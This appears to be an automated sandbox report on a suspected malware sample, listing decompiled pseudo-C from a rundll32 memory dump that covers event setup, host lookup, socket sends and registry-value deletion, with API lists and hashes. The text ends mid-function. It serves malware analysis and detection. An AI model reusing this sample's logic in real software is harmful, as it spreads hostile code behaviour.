                                                            					 *(_t97 + 0x44) = 0;
                                                            					 *(_t97 + 0x48) = 0;
                                                            					 *(_t97 + 0x4c) = 0;
                                                            					 *((intOrPtr*)(_t97 + 0x50)) = 3;
                                                            					 *(_t97 + 0x54) = 0;
                                                            					 *(_t97 + 0x58) = 0;
                                                            					 *_t90 = 0;
                                                            					_t90[1] = 0;
                                                            					_t90[2] = 0;
                                                            					E0463ADA0(_t90, 0, _t90, 0);
                                                            					_t108 = _t108 - 0xc;
                                                            					_t27 = _t97 + 0x68; // 0x68
                                                            					_t87 = _t27;
                                                            					_t88 = _t87;
                                                            					L0463ABB0(_t88, CreateEventW, __ebx);
                                                            					_t28 = _t97 + 0x14c; // 0x14c
                                                            					 *(_t97 + 0x148) = 0;
                                                            					if(InitializeCriticalSectionAndSpinCount(_t28, 0) == 0) {
                                                            						L7:
                                                            						_push(0x80004005);
                                                            						E04637AC0();
                                                            						goto L8;
                                                            					} else {
                                                            						 *(_t97 + 0x168) = 0;
                                                            						 *(_t97 + 0x16c) = 0;
                                                            						 *(_t97 + 0x164) = 0;
                                                            						 *((intOrPtr*)(_t97 + 0x170)) = _t87;
                                                            						_t83 = CreateEventW(0, 0, 0, 0);
                                                            						 *(_t97 + 0x174) = _t83;
                                                            						_pop(_t87);
                                                            						if(_t83 == 0) {
                                                            							L8:
                                                            							_push(0x80004005);
                                                            							E04637AC0();
                                                            							goto L9;
                                                            						} else {
                                                            							_t84 = CreateEventW(0, 0, 0, 0);
                                                            							 *(_t97 + 0x178) = _t84;
                                                            							if(_t84 == 0) {
                                                            								L9:
                                                            								_push(0x80004005);
                                                            								E04637AC0();
                                                            								goto L10;
                                                            							} else {
                                                            								_t85 = CreateEventW(0, 0, 0, 0);
                                                            								 *(_t97 + 0x17c) = _t85;
                                                            								if(_t85 == 0) {
                                                            									L10:
                                                            									_push(0x80004005);
                                                            									E04637AC0();
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									asm("int3");
                                                            									_push(_t97);
                                                            									_t98 = _t88;
                                                            									_push(_t92);
                                                            									 *_t98 = 0x467e280;
                                                            									if( *((intOrPtr*)(_t98 + 0x50)) != 3) {
                                                            										E0464F850(_t88);
                                                            									}
                                                            									_t59 =  *(_t98 + 0x17c);
                                                            									_t93 = CloseHandle;
                                                            									if(_t59 == 0 || CloseHandle(_t59) != 0) {
                                                            										_t60 =  *((intOrPtr*)(_t98 + 0x178));
                                                            										if(_t60 == 0) {
                                                            											L17:
                                                            											_t61 =  *((intOrPtr*)(_t98 + 0x174));
                                                            											if(_t61 == 0) {
                                                            												L19:
                                                            												E0463AC60(_t98 + 0x164);
                                                            												DeleteCriticalSection(_t98 + 0x14c);
                                                            												_t88 = _t98 + 0x68;
                                                            												E0463AB40(_t87, _t88);
                                                            												_t65 =  *(_t98 + 0x5c);
                                                            												if( *(_t98 + 0x5c) != 0) {
                                                            													L0465ED17(_t65);
                                                            													_t108 = _t108 + 4;
                                                            													 *(_t98 + 0x5c) = 0;
                                                            													 *(_t98 + 0x60) = 0;
                                                            													 *(_t98 + 0x64) = 0;
                                                            												}
                                                            												_t66 =  *(_t98 + 4);
                                                            												if(_t66 == 0) {
                                                            													L23:
                                                            													 *_t98 = 0x467dfa4;
                                                            													return _t66;
                                                            												} else {
                                                            													_t66 = CloseHandle(_t66);
                                                            													if(_t66 == 0) {
                                                            														goto L27;
                                                            													} else {
                                                            														goto L23;
                                                            													}
                                                            												}
                                                            											} else {
                                                            												_push(_t61);
                                                            												if( *_t93() == 0) {
                                                            													goto L26;
                                                            												} else {
                                                            													goto L19;
                                                            												}
                                                            											}
                                                            										} else {
                                                            											_push(_t60);
                                                            											if( *_t93() == 0) {
                                                            												goto L25;
                                                            											} else {
                                                            												goto L17;
                                                            											}
                                                            										}
                                                            									} else {
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L25:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L26:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										L27:
                                                            										_push(0x80004005);
                                                            										E04637AC0();
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										asm("int3");
                                                            										_push(_t104);
                                                            										_push(_t98);
                                                            										_t100 = _t88;
                                                            										L11();
                                                            										if((_a8 & 0x00000001) != 0) {
                                                            											_push(0x188);
                                                            											E04655B47(_t100);
                                                            										}
                                                            										return _t100;
                                                            									}
                                                            								} else {
                                                            									 *(_t97 + 0x180) = 0;
                                                            									 *(_t97 + 0x184) = 0;
                                                            									return _t97;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}




















                                                            0x04637f60
                                                            0x04637f60
                                                            0x04637f61
                                                            0x04637f65
                                                            0x04637f6b
                                                            0x04637f75
                                                            0x04637f7b
                                                            0x04637f7d
                                                            0x04637f82
                                                            0x046380e7
                                                            0x046380ec
                                                            0x00000000
                                                            0x04637f88
                                                            0x04637f8b
                                                            0x04637f8b
                                                            0x04637f8e
                                                            0x04637f91
                                                            0x04637f98
                                                            0x04637f9f
                                                            0x04637fa6
                                                            0x04637fae
                                                            0x04637fb5
                                                            0x04637fbc
                                                            0x04637fc3
                                                            0x04637fca
                                                            0x04637fd1
                                                            0x04637fd8
                                                            0x04637fdf
                                                            0x04637fe6
                                                            0x04637fed
                                                            0x04637ff4
                                                            0x04637ffb
                                                            0x04638004
                                                            0x0463800b
                                                            0x04638012
                                                            0x04638019
                                                            0x04638023
                                                            0x04638029
                                                            0x04638030
                                                            0x04638037
                                                            0x0463803c
                                                            0x0463803f
                                                            0x0463803f
                                                            0x04638042
                                                            0x04638044
                                                            0x0463804b
                                                            0x04638051
                                                            0x04638064
                                                            0x046380f1
                                                            0x046380f1
                                                            0x046380f6
                                                            0x00000000
                                                            0x0463806a
                                                            0x04638072
                                                            0x0463807c
                                                            0x04638086
                                                            0x04638090
                                                            0x04638096
                                                            0x04638098
                                                            0x0463809e
                                                            0x046380a1
                                                            0x046380fb
                                                            0x046380fb
                                                            0x04638100
                                                            0x00000000
                                                            0x046380a3
                                                            0x046380ab
                                                            0x046380ad
                                                            0x046380b5
                                                            0x04638105
                                                            0x04638105
                                                            0x0463810a
                                                            0x00000000
                                                            0x046380b7
                                                            0x046380bf
                                                            0x046380c1
                                                            0x046380c9
                                                            0x0463810f
                                                            0x0463810f
                                                            0x04638114
                                                            0x04638119
                                                            0x0463811a
                                                            0x0463811b
                                                            0x0463811c
                                                            0x0463811d
                                                            0x0463811e
                                                            0x0463811f
                                                            0x04638120
                                                            0x04638121
                                                            0x04638123
                                                            0x04638128
                                                            0x0463812e
                                                            0x04638130
                                                            0x04638130
                                                            0x04638135
                                                            0x0463813b
                                                            0x04638143
                                                            0x0463814c
                                                            0x04638154
                                                            0x0463815d
                                                            0x0463815d
                                                            0x04638165
                                                            0x0463816e
                                                            0x04638174
                                                            0x04638180
                                                            0x04638186
                                                            0x04638189
                                                            0x0463818e
                                                            0x04638193
                                                            0x04638196
                                                            0x0463819b
                                                            0x0463819e
                                                            0x046381a5
                                                            0x046381ac
                                                            0x046381ac
                                                            0x046381b3
                                                            0x046381b8
                                                            0x046381c1
                                                            0x046381c2
                                                            0x046381c9
                                                            0x046381ba
                                                            0x046381bb
                                                            0x046381bf
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046381bf
                                                            0x04638167
                                                            0x04638167
                                                            0x0463816c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463816c
                                                            0x04638156
                                                            0x04638156
                                                            0x0463815b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463815b
                                                            0x046381ca
                                                            0x046381ca
                                                            0x046381cf
                                                            0x046381d4
                                                            0x046381d4
                                                            0x046381d9
                                                            0x046381de
                                                            0x046381de
                                                            0x046381e3
                                                            0x046381e8
                                                            0x046381e8
                                                            0x046381ed
                                                            0x046381f2
                                                            0x046381f3
                                                            0x046381f4
                                                            0x046381f5
                                                            0x046381f6
                                                            0x046381f7
                                                            0x046381f8
                                                            0x046381f9
                                                            0x046381fa
                                                            0x046381fb
                                                            0x046381fc
                                                            0x046381fd
                                                            0x046381fe
                                                            0x046381ff
                                                            0x04638200
                                                            0x04638203
                                                            0x04638204
                                                            0x04638206
                                                            0x0463820f
                                                            0x04638211
                                                            0x04638217
                                                            0x0463821c
                                                            0x04638223
                                                            0x04638223
                                                            0x046380cb
                                                            0x046380cb
                                                            0x046380d8
                                                            0x046380e4
                                                            0x046380e4
                                                            0x046380c9
                                                            0x046380b5
                                                            0x046380a1
                                                            0x04638064

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04638B27,0467E048,?), ref: 04637F7B
                                                              • Part of subcall function 0463ABB0: HeapCreate.KERNEL32(00000004,00000000,00000000,74D0F5E0,00000004,04638329,?,04638B6E,0467E024,?), ref: 0463ABD5
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000,?,04638B27,0467E048,?), ref: 0463805C
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04638B27,0467E048,?), ref: 04638096
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04638B27,0467E048,?), ref: 046380AB
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046380BF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                            • String ID:
                                                            • API String ID: 1949328396-0
                                                            • Opcode ID: 3ef4c1ba2d8541eaf2886ecc948d08f95debf425a95fec872dae7e500bcb3236
                                                            • Instruction ID: 148bc53edb51120f6f58b22992ba9dc0a6a4acce7f88257012576e0f96d3d293
                                                            • Opcode Fuzzy Hash: 3ef4c1ba2d8541eaf2886ecc948d08f95debf425a95fec872dae7e500bcb3236
                                                            • Instruction Fuzzy Hash: F841C1B0140B45ABF3309F65CC59B83BAE4EF10719F10491DE69AAA6D0D7F6B148CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 28%
                                                            			E0464D160(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed short* _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				signed short _v60;
                                                            				char _v176;
                                                            				char _v180;
                                                            				intOrPtr _v184;
                                                            				intOrPtr _v188;
                                                            				char _v200;
                                                            				intOrPtr _v204;
                                                            				void* __ebp;
                                                            				signed int _t27;
                                                            				char* _t33;
                                                            				signed short _t35;
                                                            				signed short* _t44;
                                                            				intOrPtr _t55;
                                                            				signed short _t60;
                                                            				char* _t65;
                                                            				void* _t66;
                                                            				signed int _t70;
                                                            				signed int _t72;
                                                            
                                                            				_t72 = (_t70 & 0xfffffff8) - 0xb4;
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t72;
                                                            				_t44 = _a4;
                                                            				asm("xorps xmm0, xmm0");
                                                            				asm("movups [esp+0xa0], xmm0");
                                                            				asm("movups [ebx+0x2], xmm0");
                                                            				asm("movq [ebx+0x12], xmm0");
                                                            				_t44[0xd] = 0;
                                                            				_v36 =  *_t44 & 0x0000ffff;
                                                            				_v184 = __edx;
                                                            				_v44 = 0;
                                                            				asm("movq [esp+0xb8], xmm0");
                                                            				_v12 = 0;
                                                            				_v40 = 0x100;
                                                            				_v180 =  &_v176;
                                                            				E0464D5B0( &_v176, _t44,  &_v180, __edi, __esi, __ecx, 3);
                                                            				_t33 =  &_v48;
                                                            				__imp__getaddrinfo(_v188, 0, _t33,  &_v52, __edi, __esi, __ebx);
                                                            				_t65 = _t33;
                                                            				_t34 = _v204;
                                                            				if(_v204 !=  &_v200) {
                                                            					L0465ED17(_t34);
                                                            					_t72 = _t72 + 4;
                                                            				}
                                                            				if(_t65 == 0) {
                                                            					_t60 = _v60;
                                                            					_t66 = 0;
                                                            					_t35 = _t60;
                                                            					if(_t60 != 0) {
                                                            						asm("o16 nop [eax+eax]");
                                                            						while(1) {
                                                            							_t55 =  *((intOrPtr*)(_t35 + 4));
                                                            							if(_t55 == 2 || _t55 == 0x17) {
                                                            								break;
                                                            							}
                                                            							_t35 =  *(_t35 + 0x1c);
                                                            							if(_t35 != 0) {
                                                            								continue;
                                                            							} else {
                                                            							}
                                                            							goto L11;
                                                            						}
                                                            						_t35 = E0465E060(_t44,  *((intOrPtr*)(_t35 + 0x18)),  *((intOrPtr*)(_t35 + 0x10)));
                                                            						_t72 = _t72 + 0xc;
                                                            						_t66 = 1;
                                                            					}
                                                            					L11:
                                                            					__imp__freeaddrinfo(_t60);
                                                            					if(_t66 == 0) {
                                                            						__imp__#112();
                                                            						return E04655AFE(_v32 ^ _t72, 0x2af9);
                                                            					} else {
                                                            						__imp__#9();
                                                            						_t44[1] = _t35;
                                                            						return E04655AFE(_v32 ^ _t72, _v204);
                                                            					}
                                                            				} else {
                                                            					__imp__#112();
                                                            					return E04655AFE(_v28 ^ _t72, _t65);
                                                            				}
                                                            			}






























                                                            0x0464d166
                                                            0x0464d16c
                                                            0x0464d173
                                                            0x0464d17b
                                                            0x0464d17e
                                                            0x0464d183
                                                            0x0464d18d
                                                            0x0464d192
                                                            0x0464d19b
                                                            0x0464d1a4
                                                            0x0464d1af
                                                            0x0464d1b3
                                                            0x0464d1be
                                                            0x0464d1c7
                                                            0x0464d1d2
                                                            0x0464d1dd
                                                            0x0464d1e1
                                                            0x0464d1ee
                                                            0x0464d1fc
                                                            0x0464d202
                                                            0x0464d208
                                                            0x0464d20e
                                                            0x0464d211
                                                            0x0464d216
                                                            0x0464d216
                                                            0x0464d21b
                                                            0x0464d23b
                                                            0x0464d242
                                                            0x0464d244
                                                            0x0464d248
                                                            0x0464d24a
                                                            0x0464d250
                                                            0x0464d250
                                                            0x0464d256
                                                            0x00000000
                                                            0x00000000
                                                            0x0464d25d
                                                            0x0464d262
                                                            0x00000000
                                                            0x00000000
                                                            0x0464d264
                                                            0x00000000
                                                            0x0464d262
                                                            0x0464d26d
                                                            0x0464d272
                                                            0x0464d275
                                                            0x0464d275
                                                            0x0464d27a
                                                            0x0464d27b
                                                            0x0464d283
                                                            0x0464d2af
                                                            0x0464d2cb
                                                            0x0464d285
                                                            0x0464d289
                                                            0x0464d28f
                                                            0x0464d2a9
                                                            0x0464d2a9
                                                            0x0464d21d
                                                            0x0464d21e
                                                            0x0464d23a
                                                            0x0464d23a

                                                            APIs
                                                            • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0464D1FC
                                                            • WSASetLastError.WS2_32(00000000), ref: 0464D21E
                                                            • FreeAddrInfoW.WS2_32(?), ref: 0464D27B
                                                            • htons.WS2_32(?), ref: 0464D289
                                                            • WSASetLastError.WS2_32(00002AF9), ref: 0464D2AF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddrFreeInfogetaddrinfohtons
                                                            • String ID:
                                                            • API String ID: 3326967445-0
                                                            • Opcode ID: 575de2bee6ee0c504e19fa2049da87e1f9e455ee5f8f15997717a0d2e6c929ca
                                                            • Instruction ID: d24028697e0db877bfdfb07e4a4df7ae9ff54f922447504b1421253aec254ed6
                                                            • Opcode Fuzzy Hash: 575de2bee6ee0c504e19fa2049da87e1f9e455ee5f8f15997717a0d2e6c929ca
                                                            • Instruction Fuzzy Hash: 6141E272A083009BEB34DF64D884BABB3E4FF89310F01461DE94987651FB31A944C793
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E04654A50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				void* _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _t36;
                                                            				long _t40;
                                                            				void** _t43;
                                                            				long _t46;
                                                            				void* _t49;
                                                            				intOrPtr _t53;
                                                            				LONG* _t57;
                                                            				void** _t64;
                                                            				void* _t67;
                                                            				signed int _t69;
                                                            
                                                            				_t36 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t36 ^ _t69;
                                                            				_t53 = _a4;
                                                            				_v16 = __ecx;
                                                            				if( *((intOrPtr*)(_t53 + 0x8c)) <= 0) {
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					_t57 = _t53 + 0x44;
                                                            					do {
                                                            						_t67 =  *(_t53 + 0x90);
                                                            						if(_t67 ==  *(_t53 + 0x94)) {
                                                            							if(_t67 != 0) {
                                                            								 *(_t53 + 0x90) = 0;
                                                            								 *(_t53 + 0x94) = 0;
                                                            								goto L6;
                                                            							}
                                                            						} else {
                                                            							_t49 =  *(_t67 + 0x2c);
                                                            							 *(_t53 + 0x90) = _t49;
                                                            							 *(_t49 + 0x30) = 0;
                                                            							L6:
                                                            							if(_t67 != 0) {
                                                            								 *(_t67 + 0x2c) = 0;
                                                            								 *(_t67 + 0x30) = 0;
                                                            								 *((intOrPtr*)(_t53 + 0x8c)) =  *((intOrPtr*)(_t53 + 0x8c)) - 1;
                                                            							}
                                                            						}
                                                            						_t40 =  *(_t67 + 0x1c);
                                                            						 *((intOrPtr*)(_t53 + 0x40)) =  *((intOrPtr*)(_t53 + 0x40)) - _t40;
                                                            						InterlockedExchangeAdd(_t57, _t40);
                                                            						 *((intOrPtr*)(_t67 + 0x34)) =  *((intOrPtr*)(_t53 + 0x88));
                                                            						_t43 =  &_v12;
                                                            						_v12 = 0;
                                                            						 *((intOrPtr*)(_t67 + 0x18)) = 3;
                                                            						 *(_t67 + 0x28) = 2;
                                                            						__imp__WSASend( *((intOrPtr*)(_t67 + 0x34)), _t67 + 0x1c, 1, _t43, 0, _t67, 0);
                                                            						if(_t43 != 0xffffffff) {
                                                            							_t64 = 0;
                                                            						} else {
                                                            							__imp__#111();
                                                            							_t64 = _t43;
                                                            						}
                                                            						if(InterlockedDecrement(_t67 + 0x28) == 0) {
                                                            							L14:
                                                            							_t46 = E0464C930(_v16 + 0xb0, _t67);
                                                            							if(_t46 == 0) {
                                                            								HeapFree( *( *(_t67 + 0x14)), _t46, _t67);
                                                            							}
                                                            							goto L16;
                                                            						} else {
                                                            							if(_t64 == 0) {
                                                            								goto L17;
                                                            							} else {
                                                            								if(_t64 != 0x3e5) {
                                                            									goto L14;
                                                            								}
                                                            								L16:
                                                            								if(_t64 == 0) {
                                                            									goto L17;
                                                            								}
                                                            							}
                                                            						}
                                                            						break;
                                                            						L17:
                                                            						_t57 = _t53 + 0x44;
                                                            					} while ( *((intOrPtr*)(_t53 + 0x8c)) > 0);
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				}
                                                            			}
















                                                            0x04654a56
                                                            0x04654a5d
                                                            0x04654a61
                                                            0x04654a64
                                                            0x04654a6e
                                                            0x04654b98
                                                            0x04654a74
                                                            0x04654a75
                                                            0x04654a80
                                                            0x04654a80
                                                            0x04654a8c
                                                            0x04654aa2
                                                            0x04654aa4
                                                            0x04654aae
                                                            0x00000000
                                                            0x04654aae
                                                            0x04654a8e
                                                            0x04654a8e
                                                            0x04654a91
                                                            0x04654a97
                                                            0x04654ab8
                                                            0x04654aba
                                                            0x04654abc
                                                            0x04654ac3
                                                            0x04654aca
                                                            0x04654aca
                                                            0x04654aba
                                                            0x04654ad0
                                                            0x04654ad6
                                                            0x04654adb
                                                            0x04654aea
                                                            0x04654aed
                                                            0x04654af9
                                                            0x04654b00
                                                            0x04654b07
                                                            0x04654b0e
                                                            0x04654b17
                                                            0x04654b23
                                                            0x04654b19
                                                            0x04654b19
                                                            0x04654b1f
                                                            0x04654b1f
                                                            0x04654b31
                                                            0x04654b3f
                                                            0x04654b49
                                                            0x04654b50
                                                            0x04654b59
                                                            0x04654b59
                                                            0x00000000
                                                            0x04654b33
                                                            0x04654b35
                                                            0x00000000
                                                            0x04654b37
                                                            0x04654b3d
                                                            0x00000000
                                                            0x00000000
                                                            0x04654b5f
                                                            0x04654b61
                                                            0x00000000
                                                            0x00000000
                                                            0x04654b61
                                                            0x04654b35
                                                            0x00000000
                                                            0x04654b63
                                                            0x04654b6a
                                                            0x04654b6a
                                                            0x04654b85
                                                            0x04654b85

                                                            APIs
                                                            • InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04654ADB
                                                            • WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04654B0E
                                                            • WSAGetLastError.WS2_32 ref: 04654B19
                                                            • InterlockedDecrement.KERNEL32(00000002), ref: 04654B29
                                                            • HeapFree.KERNEL32(?,00000000,?,?), ref: 04654B59
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                            • String ID:
                                                            • API String ID: 930714758-0
                                                            • Opcode ID: 072c038e0352d49342b0b80e8cdebe379534e1cc415b0e15974def9be19d9791
                                                            • Instruction ID: 000531fa5e29758a0b361021f7f3525c9900100ec7df00ab41abbbd0962c92a0
                                                            • Opcode Fuzzy Hash: 072c038e0352d49342b0b80e8cdebe379534e1cc415b0e15974def9be19d9791
                                                            • Instruction Fuzzy Hash: 44414B716002049FDB20DF65D888BAAB7B9FF54310F0542ADED0A8B299FF75A944CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E04640FE0(intOrPtr __ecx, intOrPtr* _a4, void* _a8) {
                                                            				void* _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				intOrPtr _v20;
                                                            				void* _v24;
                                                            				intOrPtr* _v28;
                                                            				char _v32;
                                                            				char _t33;
                                                            				short* _t36;
                                                            				void* _t37;
                                                            				long _t38;
                                                            				short* _t51;
                                                            				char* _t54;
                                                            				intOrPtr* _t58;
                                                            				short* _t60;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				int _t63;
                                                            				void* _t64;
                                                            				void* _t65;
                                                            				void* _t66;
                                                            
                                                            				_t61 = _a8;
                                                            				_t58 = _a4 + 1;
                                                            				_v20 = __ecx;
                                                            				_v28 = _t58;
                                                            				_v24 = 0;
                                                            				_t33 = _t61 - 1 + _t58;
                                                            				_v32 = _t33;
                                                            				if(_t33 - _t58 >= 4) {
                                                            					_v8 =  *_t58;
                                                            					_v28 = _t58 + 4;
                                                            				} else {
                                                            					_v24 = 1;
                                                            					_v8 = 0;
                                                            				}
                                                            				_t36 = E04640D20( &_v32);
                                                            				_t54 =  &_v32;
                                                            				_t51 = _t36;
                                                            				_t37 = E04640D20(_t54);
                                                            				_t60 = _t37;
                                                            				if(_v24 == 0) {
                                                            					_t38 = _t61 + 4;
                                                            					_v12 = _t38;
                                                            					_t62 = LocalAlloc(0x40, _t38);
                                                            					_v16 = _t62;
                                                            					E0465E060(_t62, _a4, _a8);
                                                            					_t66 = _t65 + 0xc;
                                                            					_t63 = 0;
                                                            					_a4 = _a8 + _t62;
                                                            					_a8 = 0;
                                                            					if(RegOpenKeyExW(_v8, _t51, 0, 0x102,  &_a8) == 0) {
                                                            						RegDeleteValueW(_a8, _t60);
                                                            						asm("sbb esi, esi");
                                                            						_t63 = 1;
                                                            						RegCloseKey(_a8);
                                                            					}
                                                            					_push(_t54);
                                                            					_push(0x3f);
                                                            					_push(_v12);
                                                            					 *_a4 = _t63;
                                                            					_t64 = _v16;
                                                            					_push(_t64);
                                                            					E04631C60( *((intOrPtr*)(_v20 + 4)));
                                                            					_t37 = LocalFree(_t64);
                                                            					if(_t51 != 0) {
                                                            						_t37 = L04655B0F(_t51);
                                                            						_t66 = _t66 + 4;
                                                            					}
                                                            					if(_t60 != 0) {
                                                            						return L04655B0F(_t60);
                                                            					}
                                                            				}
                                                            				return _t37;
                                                            			}
























                                                            0x04640feb
                                                            0x04640fee
                                                            0x04640ff0
                                                            0x04640ff3
                                                            0x04640ff9
                                                            0x04641000
                                                            0x04641002
                                                            0x0464100a
                                                            0x04641021
                                                            0x04641024
                                                            0x0464100c
                                                            0x0464100c
                                                            0x04641013
                                                            0x04641013
                                                            0x0464102a
                                                            0x0464102f
                                                            0x04641032
                                                            0x04641034
                                                            0x0464103d
                                                            0x0464103f
                                                            0x04641045
                                                            0x0464104b
                                                            0x04641057
                                                            0x0464105c
                                                            0x04641060
                                                            0x04641068
                                                            0x0464106d
                                                            0x0464106f
                                                            0x04641075
                                                            0x0464108b
                                                            0x04641091
                                                            0x0464109c
                                                            0x0464109e
                                                            0x0464109f
                                                            0x0464109f
                                                            0x046410a8
                                                            0x046410ac
                                                            0x046410ae
                                                            0x046410b1
                                                            0x046410b3
                                                            0x046410b9
                                                            0x046410ba
                                                            0x046410c0
                                                            0x046410c8
                                                            0x046410cb
                                                            0x046410d0
                                                            0x046410d0
                                                            0x046410d5
                                                            0x00000000
                                                            0x046410dd
                                                            0x046410d5
                                                            0x046410e6

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0464104E
                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04641083
                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 04641091
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464109F
                                                            • LocalFree.KERNEL32(?,?,?,0000003F), ref: 046410C0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                            • String ID:
                                                            • API String ID: 3540541088-0
                                                            • Opcode ID: 2b7be8dd9a9b4ae7303256ba06f71f423ba3d8db16cae6052eaa4ace23d6769f
                                                            • Instruction ID: fa2d00fbc5cd798a63cb5bf1aab82bc82ad335cb750611b2bfca52e14a619b91
                                                            • Opcode Fuzzy Hash: 2b7be8dd9a9b4ae7303256ba06f71f423ba3d8db16cae6052eaa4ace23d6769f
                                                            • Instruction Fuzzy Hash: 1F3181B5D00218ABDF10DFA4D948AEEBBB8EF45754F14802AF905A7200EB35AB44CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E04634FB0(intOrPtr __ecx, long _a4) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				short _t27;
                                                            				long _t28;
                                                            				signed int _t30;
                                                            				void* _t34;
                                                            				WCHAR* _t37;
                                                            				long _t44;
                                                            				short _t47;
                                                            				signed int _t52;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				WCHAR* _t58;
                                                            
                                                            				_v8 = 0;
                                                            				_t58 = _a4;
                                                            				_t44 = 0;
                                                            				_t46 = __ecx + 0x18;
                                                            				_v12 = __ecx;
                                                            				if(__ecx + 0x18 != _t58) {
                                                            					_push(0xffffffff);
                                                            					L046335F0(_t46, _t58, 0);
                                                            				}
                                                            				_t27 = _t58[0xa];
                                                            				_t52 = _t58[8];
                                                            				if(_t27 < 8) {
                                                            					_t47 = _t58;
                                                            				} else {
                                                            					_t47 =  *_t58;
                                                            				}
                                                            				if( *((short*)(_t47 + _t52 * 2 - 2)) == 0x5c) {
                                                            					L12:
                                                            					_t28 = 0xb + _t58[8] * 2;
                                                            					_a4 = _t28;
                                                            					_t54 = LocalAlloc(0x40, _t28);
                                                            					 *_t54 = 0x6a;
                                                            					 *((intOrPtr*)(_t54 + 1)) = _v8;
                                                            					 *((intOrPtr*)(_t54 + 5)) = _t44;
                                                            					_t30 = _t58[8];
                                                            					if(_t58[0xa] >= 8) {
                                                            						_t58 =  *_t58;
                                                            					}
                                                            					_t22 = _t54 + 9; // 0x9
                                                            					E0465E060(_t22, _t58, 2 + _t30 * 2);
                                                            					_push(0x3f);
                                                            					_push(_a4);
                                                            					_push(_t54);
                                                            					_t34 = E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					LocalFree(_t54);
                                                            					return _t34;
                                                            				} else {
